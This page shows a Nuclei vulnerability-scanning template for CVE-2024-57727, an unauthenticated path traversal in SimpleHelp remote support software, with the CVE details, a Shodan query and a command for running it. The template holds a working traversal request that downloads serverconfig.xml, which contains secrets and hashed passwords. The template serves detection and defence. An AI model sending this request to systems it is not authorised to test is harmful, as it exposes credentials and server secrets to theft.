Skip to content

SimpleHelp <= 5.5.7 - Unauthenticated Path Traversal

ID: CVE-2024-57727

Severity: high

Author: iamnoooob,rootxharsh,pdresearch,3th1cyuk1

Tags: cvec,cve2024,simplehelp,lfi,kev

SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.

id: CVE-2024-57727
info:
name: SimpleHelp <= 5.5.7 - Unauthenticated Path Traversal
author: iamnoooob,rootxharsh,pdresearch,3th1cyuk1
severity: high
description: |
SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.
reference:
- https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier
- https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-57727
cwe-id: CWE-22
epss-score: 0.0009
epss-percentile: 0.401
cpe: cpe:2.3:a:simple-help:simplehelp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: simple-help
product: simplehelp
shodan-query: html:"SimpleHelp"
tags: cvec,cve2024,simplehelp,lfi,kev
http:
- raw:
- |
GET /toolbox-resource/../serverconfig.xml HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<SimpleSuite'
- '<HashPassword>'
condition: and
- type: word
part: content_type
words:
- 'application/octet-stream'
# digest: 4b0a00483046022100f65b615ea4c1f3073544e79481f792e898fff6f23dec1383f49246f18d672911022100bbe0620ef06664a7b770b1c04e36dc8e186c6c01b452809d1ff673646dc1046f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-57727.yaml"

View on Github